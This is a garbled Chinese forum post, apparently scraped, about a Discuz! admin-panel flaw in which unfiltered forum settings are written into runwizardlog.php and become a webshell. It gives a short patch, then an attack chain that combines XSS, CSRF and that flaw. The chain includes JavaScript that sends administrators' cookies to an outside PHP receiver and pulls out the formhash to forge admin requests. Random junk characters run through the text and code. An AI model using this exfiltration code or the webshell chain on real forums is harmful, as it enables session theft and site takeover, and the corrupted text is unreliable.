; G& o- |# H, x/ y& i1 n fclose($fp);8 T# k$ w1 B0 E
- h' F- s0 Y" i/ p1 h+ t, Q} 2 o( r+ b4 J0 X复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里. {: `, _4 L; j; j, q
以下是修补的办法:function saverunwizardhistory() { - K8 ^% l4 J4 L* ]. q/ t9 K: p( ^( |& w8 j- ?' e: L' y
global $runwizardfile, $runwizardhistory;) }$ [9 u1 {" `7 V% C: E9 {
" p7 W) a* T" t
$fp = fopen($runwizardfile, 'w'); : |' z4 y& p8 b' w- f% X3 w% m1 Y& H4 f3 h5 c
$s = '<?php exit;?>';3 h, [3 O" u8 w6 B" T7 J3 p, o' V- w
- {* x" p: I- |# ^- O6 Z# _
$s .= serialize($runwizardhistory); 9 |3 Q0 P. q5 N( ~1 O. A9 j/ e$ L K; F, K) W
fwrite($fp, $s); 3 q3 R7 y2 ~9 ]* ?4 Q: n+ c- C9 N5 A& G. i; b
fclose($fp); , |. K+ l6 F+ V2 l v! F% }, u" v( r# ~: r0 z
}; W5 S: A4 A# V
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.4 D: E6 r, }; c- M D+ y, x
) h" I% L- O% P
0 g( W% o$ L) _) E
9 }8 `% {3 y" h7 r4 ^2 N& f1 H
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------, p# G3 O/ \8 K4 e/ d3 w& G
9 ?( h9 y3 w5 c4 o7 u & {% U0 Z" ^" u% m$ F% t 以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了./ P5 b1 L1 [+ B/ n2 l8 z
3 e( y% }6 [$ P$ l; J, {
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL. * ~+ v* d! g, ]) R1 S , ]- l+ d$ Z" a这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少. ) o8 g! f% q& P( G6 W' T/ Y: U/ {' U. g7 i2 d9 N
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:8 _" h. J/ O4 Z6 P; ~' Y2 A
, h/ `3 a _- L! M& ]( F
var url="http://目标网站/admincp.php"; " Q+ T. ^. V/ b2 r3 `# d
0 A0 x6 T9 F0 s* R
/*获得cookies*/ 3 H# q. g8 M- |4 i" V( K; A5 X 7 k2 E( d( ?; rfunction getURL(s) {1 E" L/ n# B) P& t
/ R% _1 P: M6 _( C7 F$ L
var image = new Image();+ t* y# r* K, ~8 M6 g% x
) a; w+ e; G: P* V* iimage.style.width = 0; 7 E E. V1 s1 b$ b( K3 M7 a' [1 S6 H& L
image.style.height = 0;3 [# k; g+ y5 ?( o: @8 Y8 a, m) m/ W4 \
9 X! W* z/ c8 j5 \0 b
image.src = s;6 p5 ]/ v+ e& |
* V: r2 ~1 c+ U" H# K7 F: e: K}2 {- y4 x D8 R
) S* r8 r/ p3 i1 P% M
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php 7 J0 y4 k9 B; y9 }复制代码php以get方式接收过来的变量.$cookies=$_GET['x']; $ T+ s6 T# z- m/ e复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 1 \: d N- X- m) ~# z- j
! _- C: A+ ~2 R1 l
3 B2 ?+ L# o& z% n1 i获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";' ]! `4 H7 C+ X2 T& O; g
, d. `$ G8 r$ `7 z9 n: A
1 t3 Y$ c4 @8 h1 Z w 1 T3 Q* @" a0 }$ f! l6 L/*hash*/ ! l: R& |( `- s. w( G4 I2 r( ~. C3 B& [4 B {9 r
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");) e4 k, [5 I$ j
Z( G0 b l7 F- I0 m: ], Avar resource = xmlHttpReq.responseText;; q' Z" j, Y5 K8 _! |: N: d
1 |0 @* T7 a. j8 r' k% v3 J. u
var numero = resource.search(/formhash/);' z s2 d7 U1 s' \
3 M c' X2 U, _1 l7 l M
var formhash=encodeURIComponent(resource.substr(numero+17,8));5 V! R7 r8 Q5 R. V& y